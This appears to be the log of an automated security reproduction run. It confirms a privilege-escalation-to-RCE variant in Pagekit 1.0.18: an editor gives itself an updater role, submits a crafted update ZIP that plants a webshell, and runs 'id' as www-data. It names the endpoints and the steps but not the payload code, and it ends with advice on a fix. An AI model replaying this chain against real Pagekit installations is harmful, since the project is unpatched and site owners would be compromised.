=== CVE-2026-57518 VARIANT: UpdateController self-updater RCE === Started: Sun Jul 5 14:07:54 UTC 2026 [*] Project cache dir: /data/pruva/project-cache/814e9433-2a24-4823-ba80-b9ed7134e121 [*] Using cached Pagekit release: /data/pruva/project-cache/814e9433-2a24-4823-ba80-b9ed7134e121/pagekit-release [*] Pagekit release at: /data/pruva/project-cache/814e9433-2a24-4823-ba80-b9ed7134e121/pagekit-release [*] Vulnerable saveAction check confirmed (only blocks Administrator role id=3) [*] Pagekit version 1.0.18 confirmed [*] Variant sink confirmed: UpdateController (system: software updates) + SelfUpdater [*] Docker image ready: pagekit-vuln-1018:repro [*] Starting container pagekit-variant ... [*] Waiting for Apache to start... [*] Apache is ready [*] Step 1: Installing Pagekit via API (SQLite)... [*] DB check: {"status":"no-tables","message":""} [*] Install: {"status":"success","message":""} [*] Pagekit installed successfully (admin user created) [*] Step 2: Setting up roles and users as admin... [*] Admin session created (user_id=1) [*] Create Updater role: {"message":"success","role":{"id":4,"name":"Updater","priority":"3","permissions":["system: software updates","system: access admin area"],"locked":false,"anonymous":false,"authenticated":false,"administrator":false}} [*] Updater role ID: 4 [*] Create User Manager role: {"message":"success","role":{"id":5,"name":"User Manager","priority":"4","permissions":["user: manage users"],"locked":false,"anonymous":false,"authenticated":false,"administrator":false}} [*] User Manager role ID: 5 [*] Create editor user: {"message":"success","user":{"id":2,"username":"editor","email":"editor@test.com","url":"","registered":"2026-07-05T14:07:56+00:00","status":1,"name":"Editor","login":null,"permissions":null,"roles":[2,5],"data":{}}} [*] Editor user ID: 2 [*] Step 3: PRIVILEGE ESCALATION — editor self-assigns Updater role... [*] Editor session created (user_id=2) [*] Editor BEFORE escalation: {"id":2,"username":"editor","email":"editor@test.com","url":"","registered":"2026-07-05T14:07:56+00:00","status":1,"name":"Editor","login":null,"permissions":null,"roles":[2,5],"data":{}} [*] Escalation response: {"message":"success","user":{"id":2,"username":"editor","email":"editor@test.com","url":"","registered":"2026-07-05T14:07:56+00:00","status":1,"name":"Editor","login":null,"permissions":null,"roles":[2,4],"data":{}}} [*] Editor AFTER escalation: roles="roles":[2,4] [*] PRIVILEGE ESCALATION CONFIRMED — editor now has 'system: software updates' [*] Step 4: Crafting malicious self-update ZIP (SelfUpdater payload)... Created /var/www/html/storage/evil_update.zip (439 bytes) app/installer/requirements.php rce_variant.php [*] Update ZIP created at /var/www/html/storage/evil_update.zip [*] Step 5: VARIANT SINK — POST /admin/system/update/download (file:// URL)... [*] Download response: [] HTTP:200 [*] Session 'system.update' path: [*] Step 6: VARIANT SINK — POST /admin/system/update/update (SelfUpdater extract)... [*] Update response (tail): Removing old files...done. Deactivating update mode...done. HTTP:200 [*] Webshell on disk (/var/www/html/rce_variant.php): yes [*] Step 7: Triggering RCE via extracted webshell... [*] RCE output (id): uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] RCE output (whoami): www-data [*] === VARIANT RCE CONFIRMED === [*] Command 'id' returned: uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] Command 'whoami' returned: www-data [*] Fixed-version check: looking for any tag/commit newer than 1.0.18... [*] No .git in release dir (release ZIP); 1.0.18 is the final release per CHANGELOG [*] Fixed version result: no-fixed-version (release ZIP; 1.0.18 is final release, project archived) [*] Evidence saved to /data/pruva/runs/4cba8383-95f2-477a-9a60-92cc4fdc9a31/bundle/logs/vuln_variant/ [*] Runtime manifest written [*] Cleaning up container... [*] === VARIANT REPRODUCTION SUCCESSFUL === [*] Distinct alternate RCE sink (UpdateController self-updater) confirmed via [*] the same saveAction privilege-escalation root cause. No fixed version [*] exists to test a bypass against (project archived); the variant shows any [*] complete fix must block self-assignment of ALL trusted permissions and [*] treat BOTH the package installer and the self-updater as exposed sinks.